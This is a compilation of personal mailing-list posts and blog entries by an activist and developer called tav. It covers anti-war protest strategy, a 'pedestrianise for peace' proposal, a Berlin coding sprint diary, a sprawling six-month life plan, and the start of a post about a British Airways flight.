|      measures. (in related news, didn't a police van drive over a
|      protestor in washington dc?)
|
|   c) annoyed enough of the public so that many actually support the
|      SFPD "peace forces" in clearing out the "troublesome protestors".
|
|   d) instilled paranoia and fear into many protestors. trust has
|      started to break down for fear of infiltration. and some are
|      afraid of doing any form of direct action for fear of their
|      lives.
|
|   e) has started to splinter a movement into militant and non-militant
|      factions. seeing the horrors has made some people more militant.
|      but at the same time, the moderates are shying away. and without
|      strength in numbers, any action will get stamped down very quickly.
|
| we need the majority of people to stand up and support us. we should be
| the people. not some "enlightened" minority.
|
|  matt> I am well aware that this will not perform an educative
|  matt> function, but I think something like this is needed to
|  matt> hammer the point home that people will not stand for being
|  matt> screwed. If not now, when, if not us, then who?
|
| i am tired of seeing some trying to make martyrs of themselves. what
| does blocking roads, and bridges and intersections achieve by itself?
| what does chanting against the police achieve by itself?
|
| notice how words like "anarchists", "hackers", etc. are constantly
| misrepresented? notice how these forces are the ones that actually
| provide some form of real alternative, and thus a real threat?
|
| the point here is that the "establishment" would use any excuse to
| misrepresent all actions. and escalated direct action with no dialogue
| would only serve in their interests. gives them an excuse to represent
| _all_ the "remaining" protestors as extremist troublemakers.
|
| and, is it me, or do people seriously underestimate the might of the
| armed forces? as it stands, there is no hope for reclaiming the bases.
| all it does is provides an excuse for the militant faction of the
| movement to be labelled as "terrorists who pose a threat to national
| security".
|
| reclaiming the bases, if it's to be done, has to be done from the
| inside. with members of the armed forces refusing to refuel the bombers.
| with dockers refusing to load arms shipments. with loved ones of
| soldiers writing in to them to give them support to stand up against
| their superiors.
|
| by chanting outside bases, all we do is cultivate an "us" and "them"
| mentality. so instead, let's:
|
|   1) listen to each other. listen and learn. let's have a war on
|      ignorance.
|
|   2) empower ourselves with dialogue and try to come up with
|      solutions. it's easy to shout *NO* to things. but, without
|      providing alternatives, the shouting is meaningless.
|
|   3) celebrate life. this *is* your life, and it *is* ending one
|      minute at a time. enjoy it. end the solitude. choose life.
|
|  giles> the problem with direct action is that most of the
|  giles> public think, whether right or not, that its just
|  giles> of bunch of thugs/peaceniks/hippies/wasters etc..
|  giles> and will therefore never listen to what they are
|  giles> saying although they may actually find they agree
|  giles> with it if they took notice.
|
| *nod* we need to cater for everyone.
|
|  giles> the answer isnt becoming more extreme but playing
|  giles> them at their own game and although it seems slower
|  giles> you cant change people's opinions overnight. i you
|  giles> act in a way that the media/politicians/public can
|  giles> find fault with then it'll make a much stronger
|  giles> point.
|
| (surely you meant can't?)
|
| in either case, i both agree and disagree. i agree that we should not be
| extremist. at the same time, we must make a strong statement.
|
| blocking off central london is, in my book, a strong statement. yet, the
| idea of dialogue is about toning down from extremist direct action and
| instead focussing on education and empowerment.
|
| i think we have a good balance here.
|
| help me. i am just one person. i can't do this alone. but together,
| anything is possible.
|
| --
| peace is now, tav
| tav@espians.com

| rehi,
|
| i have often expressed my discontent of protest marches, petitions, and
| the likes of direct action such as hunger strikes, sit-ins, blockades,
| chaining oneself to..., etc.
|
| i agree with all of them in theory, and in practise they all work great
| as acts of solidarity. they bring people together. let people know that
| they are not alone in their feelings.
|
| however, unfortunately for us, their value has been diminished over the
| years. the hippies did too good a job. values and beliefs and actions so
| adapted by mainstream culture, that they have no effect.
|
| so let's not merely walk from A to B. let's not block traffic and
| achieve nothing besides annoying people and getting yourself nicked.
| let's not chant mindlessly at the police -- these guys are just doing
| their job, they've heard the fucking chants all day long.
|
| it's time to take things a step further. time to do something
| constructive. and so, i would like to propose the "pedipeace movement"
| -- pedestrianise for peace.
|
| let's choose one day, and on that day, not have cars travel through
| london, and form circles at every other crossroads, and have a dialogue
| about various issues.
|
| it doesn't even have to all be a dialogue of words. at some crossroads,
| we could have wonderful music and dance. at some crossroads, we could
| have beautiful men and women giving out free food.
|
| we could discuss nuclear disarmament at oxford circus, palestine at
| cambridge circus. the idea is to have a circle at many crossroads and
| people to come forward to the middle and express themselves. to have a
| dialogue.
|
| we should practise the law of two feet, which states simply that if you
| find yourself in a situation where you are neither learning nor
| contributing – use your two feet and move to some place more to you
| liking. maybe to another crossroad, or maybe to a park somewhere. no
| matter what, don’t sit there feeling miserable.
|
| we could create some infrastructure to make this happen better. e.g.
| let's say that people are discussing nuclear disarmament at oxford
| circus. i go there and text a number (let's say 2661) "nuclear disarmament".
|
| and then, when someone sends a second number (let's say 2662), asking
| where people are discussing "nuclear disarmament", it would send back
| directions to the one at oxford circus. you could add the numbers of
| your friends to the system so that people could filter the results more
| effectively...
|
| so, in summary... we would have true dialogue. not some pompous git
| standing up on stage lecturing us all, but instead dialogue between the
| people. democracy. we would have achieved something constructuve. every
| nite, people could go back and write up summaries of what happened...
|
| we would have people talking to each other. we would have people
| learning more about the land around them. their geography. we could have
| wonderful street parties in the night, celebrating life.
|
| we would be expressing our discontent by blocking off central london.
| and, yet at the same time, we would be practising what we preach by
| using cars less. we are all oil junkies. it's time to ease up on our
| addiction.
|
| many people are angry. many people feel betrayed. but, let's direct that
| energy into achieving something constructive. into creating the world
| that we want. let's not just chant mindlessly. let's come up with solutions.
|
| i would appreciate everyone's thoughts and comments on this. criticism,
| both positive and negative, is very welcome. i would like to give this a
| serious push once we've got a solid plan in place.
|
| --
| peace is now, tav
| tav@espians.com

| time. 2am. place. the wobbly (millennium) bridge.
|
| after entertaining myself running around the trees, i pull
| myself up onto the wobbly bridge and gently skip along. my
| heart beats slightly faster as i see the river flow underneath
| me. the thrill of being so high. the thrill of falling.
|
| clumsily pull myself over the side, straddle a beam and sit,
| watching the river flow. i lean back, feel the aura of the
| full moon. the wind blows. so soft. but with a sharpness that
| makes me alert. aware. lyrics come to mind "london calling to
| the underworld... i live by the river!"
|
| i get up to climb back over. i almost slip. heart beats. back
| on the wobbly. start to skip along again. in front of me, a
| giant circle. a perfect circle. a circle of objects. i look
| around -- no-one to be seen. a present from an anonymous
| stranger.
|
| i delight in the find and start exploring. a mobile phone. a
| paintbrush. a block of wood. a pressure valve. a blue tin
| (labelled russian caviar). i look inside. some round stones.
| another block of wood. too many objects to be mentioned here.
| the wind takes on a cold edge, but the present makes me very
| warm.
|
| and in the middle of this perfect circle, at the exact middle
| of the bridge (both lengthways and sideways), a grey and
| white toy bunny with a fat blue alkaline battery. i ponder
| upon the present for a long time. is there a clever message?
|
| for some reason, the words "beautiful girl lovely dress"
| sample across my mind's ear. a cyclist zooms by. i call back
| at him. he stops. he turns. he approaches cautiously. i ask
| him what he thinks. maybe a clock he says. doesn't have
| anything interesting to say. i let him go.
|
| i explore the present further. time goes by. i feel inspired.
| thoughts provoked. another walks by. i wave. we speak. i can
| sense the samani in this creature. we will be good friends.
|
| i bid the present goodbye, and decide to spend the remaining
| hours of the morning exploring the mind of this new found
| friend. and fun hours they were.

| > Following the suggestion of a few members in the last couple
| > of weeks, we've created a new email group for members who are
| > based at The Hub in Islington
|
| Another interesting development.
|
| Whilst all approaches to improving the signal-to-noise ratio is
| very welcome, is this really the right approach? Sure, all those
| mails asking about missing chargers clog up our inboxes. But as
| someone who has had a few of his phone chargers (not to mention
| a laptop!) going walkies from the Hub, I can certainly emphatise.
|
| I'd contest that all the frivolous "noisy" mails are essential
| for the continuity of the community. Otherwise, this is just yet
| another information channel and we already have more than enough
| of those. The reason most people are on here is probably because
| of the quality of the other people on here. I certainly am here
| because it gives me a feeling of the pulse of my Hub family. The
| personal connection. If I wanted impersonal high quality
| information, I'd just go and google. Millions of strangers.
|
| So if it's the personal connections that brings us here, then
| surely we have to deal with the noise from time to time? Because
| it's that which lubricates and keeps the list alive.
|
| I have found 3 things which help form great communities.
|
| * The engaged wise who provide something of value
| * The noisy young who give it character and act as a binding agent
| * The ease of which someone can transition between active/dormant
|
| And all attempts that I've seen which have tried to separate any
| of those have led to poorer communities.
|
| Anyways, just my two cents. Anyone have any further thoughts?
|
| On a side note, do we have any Hubs opening up by the sea? As I
| sit here overlooking the ocean, I can't but feel truly connected
| to the world as a whole. It's euphoric. Whilst they might drown
| if the sea level ever rises, it'd be a worthy investment just
| for the pure pleasure it provides in the now.
|
| --
| love, tav
|
| trajectory: boscaswal -> 3rd -> london -> 4th -> brussels -> 6th
| -> london -> 7th -> paris -> 9th -> london -> ?
|
| founder and ceo, esp metanational llp
| plex:espians/tav | tav@espians.com | +44 (0) 7809 569 369

Squarepusher pulses around as this is written. In contrast to the horrendous techno that some Germans seem intent on playing, this Brit demonstrates that electronic music can have soul.

Is music the soul of life? Or was that the spice of life? Who cares. Life is good. Too good. One can almost forget the rest of the world here. Enjoy the moment. Savour the taste. Wonder about the grasshoppers. What do they make of this funny existence we share? A shooting star blazes above. Make a wish.

The inevitable question arises. Why exactly are we here? No-one can give an answer. Everyone can give an answer.

“Have a bloody good time!” someone chirps. Yes grasshopper.

Seems we are also here for a coding sprint. What’s a coding sprint you ask. 500m relays with printouts of source code handed between the runners in place of batons? No. Well, almost.

A “canonical” definition:

A “coding sprint” is an event loosely inspired by Extreme Programming, where a number of developers get together for a few days of intense pair programming on a common project.

The practise was pioneered by the Zope and Python communities and is now being rapidly adopted by many software development teams — open sourced and closed sourced alike.

Fascinating eh? Well, no. But a good way to code. Load up emacs. Hit M-x make-frame-on-display. Collaborate. A good way to code. Collaboration. A good way to live.

The world within my mind differs so much from the world outside. Listen to “Jeder ist in seiner eigenen Welt”. Funny song. Within it lies the key to solving all social problems.

The continuing attacks in London worry me. Perhaps one should be afraid. But fear leads to the Dark Side. Our police murder an innocent man. Yet, they defend their new shoot-to-kill policy. Just as worrying as the attacks themselves.

The extremists are winning. Anti-terror laws are passed. Civil liberties and social politeness melt away. Al-Qaeda. Our government seems to have no clue about fighting this threat. They react in the traditional way. They mistake a decentralised organisation for one with a centralised hierarchy. They react just as they are expected to.

One can almost forget the rest of the world here. Almost. Lightning illuminates the surrounding landscape. Thunder puts it into perspective. Whisky flows through my veins. Mosquito bites all over. Must not scratch.

Where are we? Almost as important as why are we here. We are in Wokule. The village of Biesenthal surrounds us. S-Bahn Bernau (part of Berlin’s public transport network) is less than half an hour away.

Grasshopper on laptop screen.

Kpi and Jörg head off to a meeting with Vodafone. Trust maps. Toman. Community currencies. People are impressed. Good contacts made.

Time stands still. You wish.

I gasp for air. 20 feet of water below me. The bank too far away. I am drowning. Primeval reflexes kick in. I surface. They are teaching me to swim. City boy adapts to the lake. A descendent of the water people familiarises himself.

Everyone else in the lake is in the nude. Beautiful girls strip and jump in. Conflicting reactions within me. Be a gentleman and avert your eyes. Or enjoy nature. Neither win. Like this writer, I am left wondering “why we all have such different modesty-maps wired into our brains. What makes a Brit inhibited, a Thai modest and a German relaxed?”.

Are modesty and politeness merely illusions? Probably so.

Pride swells on learning that Comic Life had won “The Best Product New to Mac OS X” in this year’s Apple Design Awards. Atariboy, the head of the espian graphic design squad, is behind it.

The Wokule community do a party @ Schloss Lanke. We help out. I wander off into the forest. Return to meet some fascinating people. Rico introduces me to the 10 Euro intrument — a bastardised version of the Berimbau. I consider making one. Kpi buys me some string. A prelude to making the Jintra.

“Too young!” she exclaims disappointedly. She had guessed 31. I turned out to be 23. She was 27. Has happened to me too often. I consider starting to lie about my age. Perhaps 29. Perhaps 27. What do you think?

Life. A series of addictions.

We look into setting up a screencast of Kalati. Discover wink. Excellent tool. Innovative. Cross-platform. Only lacking in sound integration. Will come soon.

Amazing, the increasing acceleration of meme propagation. Networking effects going into overdrive. Take the term “screencast” for example. Coined by Jon Udell less than a year ago, creations already number many thousands. Whilst there will be no Singularity, it is hard to see why not. Faster! Schnell! Vite!

Microsoft puts out the first alpha version of its next generation operation system — Windows Vista (née Longhorn). Perfect timing. Couldn’t be better for us strategically. Thank you Microsoft.

An ex-Microsoft employee comes to visit us. He likes what we are doing. Next generation. Trust. Social Networking. Friendster. Affluent contacts. Managing contacts. German Senate. Berlin. Google. Vista. Double binds. The conversation meanders.

Zool tells me about the O’Reilly Mapping Hacks book she has written. Points me to the some of the interesting work she has been doing. I am happy that the espian community attracts the likes of her.

Kpi, Jörg, Ina, Kati, and myself head off to the NOG party. Other side of Berlin. Our human-based navigation systems break down. Would be nice to have good geo apps. We arrive just past midnight. Join the mass of hundreds. A friend is behind the bar. Always good. Hallucinogens. I wish she was here.

Oscillation. Grasshopper whispers.

Kpi leads a visualisation technique. We build a timeline across the fields of Wokule. High in the hills far away lies “Plexnet 1.0” — only half visible and far away.

Elka accidentally unplugs my laptop. Battery-less laptop dies immediately. Takes half a day’s work with it. Elka appeases me with sweeties. Mmm, sweeties! Thank you.

Kalati sprint to get the plexnet into a deployable state — version 0.0.0.5

Yet another of evangineer's predictions come true as Django is released. Pitching itself as “The Web framework for perfectionists with deadlines”, this Python-based framework follows in the wake of the hype-induced success of the Ruby on Rails web application framework. In its favour are the several well-established and high-profile deployments. Against it is the lack of a charismatic evangelist.

The relation between hype and fashion is a funny one. Whilst much of it is merely a passing trend, some of it sticks around to be relished by future generations. Like good sandwiches. Cucumber and peanut butter sandwich. Very tasty. Thanks qopi.

What is old is new again. DHTML is AJAX. Keywords are Tags. Virtual Folders are Saved Searches. Portals are Digital Lifestyle Aggregators. Usenet is Darknet. Push is RSS.

The dragonflies have grown. Come hither.

| /////////////////////////////////////////////////////////////////
|
|   1. realisations and hard lessons learnt.
|
|   2. my plans for the coming 6 months.
|
| /////////////////////////////////////////////////////////////////
|
| \
| #
| / lessons learnt
| #
| \
|
| i have woken up from the funk that i entered back in april.
|
| this has, without doubt, been the quietest period of my life. i achieved
| fuck all.
|
| my apologies also for not really talking and keeping in contact much.
| whereas usually i do that because i am caught up in something exciting,
| and forgotten to even eat, the last few months have just been shit.
|
| anyways, i recently got one of my moments of extreme clarity. when
| everything came together in perfect harmony. the last time this happened
| was when i was 16, and resulted in a lot of fun things, like esp =)
|
| this moment of clarity has served to put my basics back in sync, taking
| into account the experiences i have had and lessons "learnt".
|
| and, although it's probably just common sense to most of you, i thought
| i would share some of my realisations, thoughts and decisions.
|
| #
| / small steps matter
| #
|
| i have always been too fixated on leaps and bounds and have hated small
| steps. this was made even more acute by my will-be-dead-at-27 thing. but
| i have come to realise that without taking small steps, you just won't
| get anywhere.
|
| the problem though is that i have always been afraid of getting stuck in
| a small step. just look around at all the shit jobs people do and
| meaningless lives they lead...
|
| but the solution is pretty simple. you just have to *simultaneously*
| focus on small steps _and_ the giant leaps. and, in the end, it is from
| the small things that the big things grow.
|
| #
| / large ego bad
| #
|
| my ego has always been a source of amusing contradiction for me. on the
| one hand, i am a relatively selfless individual. but, yet, i am
| extremely self orientated.
|
| and, recently, it not only bordered on arrogance, but was arrogant.
|
| but, even worse, my ego was damaging my work to unite the world. at
| times, i became over-protective of my ideas. but, that was just plain
| stupid. not to mention hypocritical for someone who doesn't believe in
| ownership.
|
| so, to be effective, i have to let go of my ego and work with others and
| treat them as the equals that they are.
|
| this, in turn has affected my plans substantially.
|
| for example, instead of creating one large organisation which will be
| the transformative, transindustrial, transnational which will lay the
| way for uniting the world, i have decided to instead focus my energies
| on creating an ecology within which multitudes of organisations can
| flourish and co-operate effectively.
|
| #
| / large ego good
| #
|
| my ego is also one of my strong points. it gives me the balls to do what
| i do, bolsters my confidence and renews my belief in my vision, which in
| turn fuels my optimism and gives me boundless energy.
|
| the trick is to use it appropriately. especially in relation with my
| charisma.
|
| unfortunately, like with ejaculation and orgasm, i had mistakenly
| thought the two came together. but, this isn't so. one can be
| charismatic without an overpowering ego, and yet be fueled by the ego.
|
| unfortunately, i haven't really had much chance to put this into
| practise yet, but now that i have realised it, should be easier to do so.
|
| #
| / like ego, like perfectionism
| #
|
| perfectionism can be a wonderful ally. i expect it from myself and
| others in the work they do for me. however, it can also be a real
| barrier. instead of simply getting something out, i try to create
| systems that accomodate all possible eventualities.
|
| but, when you consider the 20/80 rule (20% effort == 80% output), and
| take into consideration the most precious commodity we all have, time,
| being a perfectionist seems to be neither wise nor advantageous.
|
| i have no idea how i am going to overcome this little problem, but if i
| am to achieve everything that i intend to, then it must be done.
|
| #
| / the importance of completion
| #
|
| one of the drawbacks of enjoying hypomania is that i am easily
| distracted. new ideas. new thoughts. oooh, shiny thing!
|
| add that to my perfectionism, and i can end up in a state of starting
| multitudes of things, but never completing them. i need to bear some
| self discipline in mind. need to ensure that the task at hand is
| completed before moving onto another.
|
| but, this is easily solvable. see, i am amazing at goal-drected
| activities (and this is in fact another benefits of hypomania i am
| told). so, all i need to do is to write and maintain todo lists!
|
| #
| / a self note
| #
|
| be more aware.
|
|               be more aware.
|
|                             be more aware.
|
| #
| / the journey is the destination
| #
|
| although i think i follow this more than most people, i need to remember
| it more.
|
| also, combined with sustainability, i have decided to live out my
| childhood fantasy of doing every job possible. so, i am going to look
| for all sorts of part-time jobs. from being a cook, to a gardener, to a
| builder, to a teacher, to an electrician, to a barman, to ...
|
| the aim with these jobs isn't to make much money, or to find a long term
| career in them, but to broaden my life in general with people,
| experience and knowledge.
|
| and, in money terms, these jobs will make me sustainable with regards to
| my basic needs. for a few days work a week, i could make enough to pay
| any bills, repay some of my debt, and afford good food, clothing and
| transport.
|
| i am tired of living on the poverty line. living on a few quid a week
| gets real tiring after the twentieth time.
|
| also, sustainability means no need to be a burden on others whilst i
| work on more ambitious projects.
|
| #
| / this is my life and it is ending one minute at a time
| #
|
| like the "journey is the destination" maxim, this is another that i have
| lived by for a long time now. but, again, i need to remember it more.
|
| too much time wasted in idling about and not enough in doing the work or
| having real fun. life is too short to simply think/talk about ideas. i
| should write things down, and wherever possible, actually implement
| them, or at least, get the ball rolling so that others can do so.
|
| i have also often found life to be a hell of a lot more fun when i keep
| this in mind constantly.
|
| #
| / integrity matters
| #
|
| somewhere along the way, i lost touch with integrity. not that i was
| intentionally trying to trick people and be immoral. but, my morals got
| perverted by my long-term logic.
|
| e.g. "it doesn't matter that i had told this person that i would repay
| them by this date, because i will simply make lots and lots of money in
| the future, and repay them back tenfold."
|
| too many promises broken. my word has been meaningless, as i was willing
| to compromise it based on my long term aims. too many loved ones hurt.
|
| so, from this point onwards, i vow to conform reality to my words, i.e.
| keep my promises and fulfill expectations, and do my best to fulfill
| previously given promises.
|
| i want to nurture a world full of love, and if i cannot keep my
| commitments and promises, then there is no reason for people to trust.
| and without trust, there is no love.
|
| also, i had been breaking expectations i had set myself. justifying to
| myself changes and modifications to my plans. "it doesn't matter if i
| don't complete this now, as once i have done this other thing, then this
| would have been solved."
|
| if i am to get anywhere in uniting the world, then my word has to be
| stronger than oak. especially to myself.
|
| \
| #
| / a summary of the coming months
| #
| \
|
| so, in order to see how well i conform reality to my words and to write
| a nice todo list for myself, i am going to lay out my general plans for
| the next 6 months, and see how well i do.
|
| so, in no particular order, we have:
|
| * sort out current situation. tie up all loose ends so that i can
|   gradually become a complete and sustainable nomad sometime during
|   the period.
|
| * setup a proper riva (live/work space) at efpee (finsbury park), and
|   gradually expand the various other locations into fully fledged rivas.
|
| * get part-time jobs of varying nature (cook / cleaner / gardener /
|   salesman / barman / stripper / tailor / mason / etc.) to pay the bills
|   and expand boundaries of knowledge and enrich life.
|
| * form a collective, with those willing and close, to experiment with
|   the various economic models, especially eco-economics (i.e. taking
|   ecological footprint into account), to provide for each other's basic
|   socio-economic needs.
|
| * finish developing xnet 1.0. this will provide the necessary groupware
|   communications, knowledge, content, commerce and project management
|   infrastructure for future. setup a few sites to demonstrate the tech.
|
| * see friends that i haven't seen in ages. see if any of my lovers still
|   love me. (my love is eternal, but to many, absence in love is often
|   like water upon fire, a little quickens but much extinguishes).
|
| * get the consultancy (opn tech? via3?) going so that it promotes the
|   toman (my open organisation) model and brings in revenue by selling
|   expertise on the various developed tech, e.g. xnet, kalati, etc.
|
| * perhaps also join via3 as a technical director and transform it into
|   the global intelligence unit for the third sector that it would like
|   to be and develop the tech needed to enable a green barter network.
|
| * work on building up the uniteddiversity lifestyle brand in general.
|   ensure that book selling, nites promotion and ud communication hub
|   have effective infrastructure. sort out ecogoods delivery to members.
|
| * get body and mind back into gear: eating regularly; exercising;
|   cleansing; sleep depriving again; meditating; practising multiple
|   awareness, memory, neural reprogramming, lucid dreaming, etc.
|
| * start reading books again. haven't done this properly in over a
|   decade. use the knowledge management features of the xnet to maintain
|   and grow an effective knowledge base. (do same with music/movies).
|
| /
|
| * code and release plex 0.1 (a decentralised network with built-in
|   indexing, event routers, and trust-matrix based identities). get
|   certain espians working on it and heading towards 0.2 with a better
|   networking layer and a working distributed, component-based
|   application framework (kalati).
|
| * step up on the war on ignorance. ensure that it is being effective,
|   and start out by creating bookshare systems and simple alternative
|   media infrastructure.
|
| * learn languages again. work on elocution wrt english/tamil. practise
|   what little french/hindi i know. and, start properly learning at least
|   one of: spanish, arabic, russian, norwegian, greek, japanese.
|
| * put espmantra into place. get a small team working on building up a
|   global profile. in keeping with the maxim of 'perception is
|   everything', a global image should be promoted through publications.
|
| * create a new business organisation to handle the sms and plex-based
|   reputation service with the venue and events registration/management
|   service. raise capital by selling franchises and traditional equity.
|   use some of this to "buy out" the shareholders of esp of old.
|
| * head out to kristiansand, norway. play with the big girl and the
|   rabbit. work on getting my amazing norwegian espian back working on
|   cool stuff again. visit the zoo.
|
| * interact and get involved with other groups and organisations again.
|   perhaps start off by renewing connections with the capitalist
|   and anarchist groups in kristiansand and giving them better tools.
|
| * go be a hippy and promote the uniteddiversity essence at the big green
|   gathering. (july 29 - august 3).
|
| * write and publish the "seed" + rehimsa document/book. this should
|   coincide with the release of plex 0.2. release both initially to the
|   'friends of tav' mailing list and post-feedback, promote it elsewhere.
|
| * lay foundations for the organisations and projects put forward in the
|   "seed" document. chief amongst these is to revive esp and fundraise
|   for it by placing the plex on the "gift market".
|
| * start repaying debt to friends in installments with the aim of all
|   personal debt to friends being cleared by the end of the 6 month
|   period.
|
| /
|
| * become a technologically enabled sustainable nomad. on average, spend:
|
|   - about a quarter of time learning (e.g. reading, listening, doing);
|
|   - another quarter working (e.g. writing, coding, building, composing)
|     on the various ideas and organisations;
|
|   - another quarter with others (e.g. talking, listening, dancing,
|     travelling, co-ordinating, negotiating);
|
|   - and, the final quarter on life essentials (e.g. eating, sleeping,
|     loving).
|
|   spread the essence of unity and love the world over.
|
| * work on the "instrument" (for those who don't know, this is a new
|   musical instrument that i intend to create. imagine air guitar making
|   actual sounds meeting hi-tech meeting dj'ing meeting manic dancing ;p)
|
| * explore wearable computing (perhaps get involved in the mithril
|   project). see if i can minimise the load of always-on technological
|   capability so that it's comfortable to carry about, and yet, be
|   effective at providing a powerful tool at all times.
|
| * go be a hacker/activist/artist at the chaos communication camp in
|   berlin, germany.
|
|   whilst there, take care of other things too. in particular, spend a
|   bit of time working on "the touch society" regarding the importance of
|   touch. (august 8-11).
|
| * perhaps travel (train?) down to greece. hook up with relevant people,
|   organisations and communities as usual. and, depending on how i feel
|   about a certain someone, meet up with her. (august 12-14)?
|
| * head out to west coast usa. start out by dropping in san francisco for
|   a few days, and then get down to los angeles to meet up with some
|   of the infoanarchy kru and work on the playainfo trailer/installation.
|   hopefully also organise a mini-meetup of all american espians.
|
|   once done, road trip to weather the dust storms at burning man. there:
|   spread the word of the multicultural yoghurt party; deploy wireless
|   infrastructure; host chats around the round table of democracy;
|   facilitate/engage in a barter economy; and, perhaps do a debut
|   performance on the "instrument". (mid august - early september).
|
| /
|
| * finish off the west coast adventure by getting the hell out of
|   civilisation for another week by chilling out with the underground up
|   in british columbia, canada. go hiking, visit hotsprings, chat about
|   gift economies. (first week of september).
|
| * bring together the relevant people and organisations to start up cge
|   (citizens of the gift economy).
|
| * get the "stop listening to the lies" campaign going in full swing down
|   in london. setup effective infrastructure for alternative mass media.
|   (hopefully the espian waveband project would have matured by then).
|
| * direct energies towards the "sustainable london" project.
|
| * setup local "resource centres" in london and as in many other places
|   as possible. amongst other things, these should:
|
|   - bring together local communities.
|
|   - house infrastructure.
|
|   - provides effective and sustainable decentralised distribution
|     mechanism to facilitate trade/plexchange.
|
| * create plex+smart card based alternative currency and identity
|   systems. tie it together with the local resource centres and get
|   individuals and businesses from all over involved and using it.
|
| * utilise the created infrastructure to bring together cultural and
|   commercial aspects of the tamil diaspora. form organisations /
|   corporations based upon this.
|
| * help sellatel get established in the telecommunications industry.
|   in particular, work on creating and launching the dial and talk
|   service leading to community networks and voip.
|
| * start local "open space" meetings in finsbury park. get the community
|   to come together in all sorts of ways. an ecclesia in the pit in
|   finsbury park. discuss issues, flirt, dance into the nite. local wtf.
|
| * attend and perform at this year's sex maniac's "pastoral" ball. a
|   lord? a shepherd? a unicorn? (september 20-21).
|
| * get "prime scholar" going. linked in with the local "resource
|   centres", this would provide better and more useful forms of
|   teaching and learning.
|
| /
|
| * organise esp0rgy. a fortnight of intense development on the plex and
|   other espian projects (e.g. espra), with the aim of releasing a beta
|   version of the plex at the end of it. possibly in london / istanbul /
|   toronto? (late september - early october).
|
| * bring together interesting and relevant groups (from all the various
|   worlds: business, political, environmental, media, artistic,
|   economical, technological, etc.) from around the world for the first
|   wtfcon in toronto, canada. (first week of october).
|
|   besides being a place to demonstrate the efforts of espians and the
|   other organisations working in and with the toman ecology, wtfcon
|   should serve as a gathering of the vanguard of "the root" movement.
|
|   promote the proliferation of local wtfs to discuss and tackle various
|   relevant issues all over the world.
|
| * bring together talented artists (music/theatre/comedy/etc.) to
|   build up awareness and highlight the problems (especially the food/air
|   deal) the world faces and potential solutions to them.
|
| * go to one of the future heartlands of espia (kerala, india) and scope
|   it out, especially in terms of building a city there.
|
|   kerala also happens to be not too far from coimbatoire where a certain
|   someone is doing her mba =) hopefully, she will be free to travel
|   around places.
|
|   whilst in india, also make preparations regarding the organisation of
|   the world social forum in january of next year, and perhaps also
|   travel to other regions, e.g. gujarat. (mid-late october).
|
| * promote relevant ideas at the da vinci institute's future of money
|   summit in colorado, usa, e.g: pecus (plex economic currency units);
|   gift, reputation and eco-economics; global reference currencies;
|   micropayments; automated bartering; and, better organisational models
|   such as toman. (october 27-29).
|
| * perhaps get involved in setting up a business to business marketplace
|   in the cote d'ivore for all that cocoa! provide the producers with
|   both soft and hard infrastructure.
|
| /
|
| * direct esp's energies into creating the plex based automated
|   multi-party bartering network which ties into reputation branding and
|   trust based producers and consumers and, of course, the toman ecology.
|
| * spend some dedicated time promoting the plex on the gift market;
|   become a "darling" of the mainstream media; focus a lot of energies on
|   business development.
|
| * co-ordinate pedipeace. preparations for this should have started right
|   after wtfcon. let peace, love and harmony ring in cities all over as
|   we engage the democracy at crossroads. (early november).
|
| * help organise and attend the european social forum in paris/st dennis,
|   france. listen to what everyone is saying, and try and help everyone
|   work together better. (november 12-16).
|
| * perhaps check out the interesting things happening in south america,
|   especially in argentina and brazil. if possible, try and live there
|   for a few weeks. (mid november - mid december)?
|
| * join the world future council and help them become more effective in
|   creating a viable alternative to the undemocratic united nations and
|   become a true voice of humanity.
|
| * work towards enhancing the status of women the world over. research
|   into and explore matriarchal societies.
|
| * start off a system of voluntary subscription to a one-child policy.
|   experiment with the idea and create a marketplace where child rights
|   can be exchanged.
|
| * establish intellectual property to be a fallacy, and build up
|   awareness of the various organisations, e.g. riaa, wipo, which are
|   hampering social evolution in selfish short-sightedness.
|
| * help create the book of money as an evolving publication/art. write a
|   piece on the various economic models for it, e.g. pecus, etc.
|
| * work a bit on writing the science-fiction novel 'under the shadows of
|   the simura' whenever inspiration strikes. likewise with 'the smiling
|   ones'.
|
| * perhaps visit sri lanka to scope out the viability of building a
|   city there.
|
| /
|
| * attend the world summit on the information society (wsis) in geneva
|   (switzerland) and get involved in the united nations effort to close
|   the digital divide. (december 10-12).
|
|   promote creating renewable-energy powered, wireless mesh-networked,
|   open source operating system and plex enhanced aierus (artificial
|   intelligence enhanced resource units). perhaps also get involved
|   beforehand in the preparatory committee meeting for wsis, prepcom-3,
|   also in geneva. (september 15-26).
|
|   and, if, there is enough momentum for it to materialise, help organise
|   and attend the world forum on communication rights.
|
| * have another session of esp0rgy in either london/istanbul with the
|   intention of releasing a near final version (0.9?) of the plex by the
|   end of it. (mid-late december)
|
| * party! get everyone i love (especially the wasp kru, espians, and
|   udites) for a new year's party that crosses national boundaries.
|   perhaps also tie it in with a big int'l uniteddiversity nite/party.
|
| * head over to india again and work on the preparations for the world
|   social forum in mumbai. provide technological infrastructure to all.
|   get everyone to focus on the solutions rather than on the problems.
|   (january 16-21).
|
| * form a political "party" that reflects the toman ecology, the real
|   biosphere and values of direct democracy balancing the global with the
|   local and the needs of the majority with that of the minority.
|
|   create a common framework for the various commons (land and labour)
|   that are being formed/nurtured, to interoperate, so that eventually,
|   when a global vote can take place on the governing of it, there can
|   be a smooth transition.
|
| * train more guardians. tie that in with putting together and growing
|   teams that can create temporary cities rapidly and effectively. the
|   city builders.
|
| * design architecture for the future that minimises ecological impact
|   whilst maximising usage of technology and fosters an environment
|   which serves to bring people together as opposed to keeping them
|   segregated.
|
| * perhaps (if i can get an invite) attend the world economic forum in
|   davos, switzerland, in the role of ceo of esp. try and convince the
|   various multinationals/nations to adopt the toman model and the
|   related economic concepts. (january 21-25).
|
| /
|
| note: any statement tempered with a "perhaps", especially that last one,
| is something that i either believe is not really possible given external
| dependencies and/or time constraints.
|
| but, as to the rest of the plan, although as a whole, it is without
| doubt extremely ambitious, each item on the todo list is well within my
| capabilities, and thus as long as i keep at it consistently, it should
| all be realisable.
|
| wish me luck, and help me stay on course!
|
| --
| happy kisses, infused with the spirit of the huntress, tav

On the British Airways flight back to London I didn't notice a single attractive air hostess. A sharp contrast to the last long haul airline I had flown with — Sri Lankan Airlines.

Call me old fashioned. Call me shallow. But air hostesses should be pleasing to the eye. It's amazing how pleasant a little eye candy can be. Makes those 9 hours fly by a lot quicker.

As for the in-flight movies — finding one that won't send you to sleep is a bit like winning the lottery. Good luck.

Of course sleep isn't too bad as far as entertainment goes. But, hopefully, none of you need any help with that. This post is instead about the Mile High Club — something which isn't as commonplace as I once imagined.
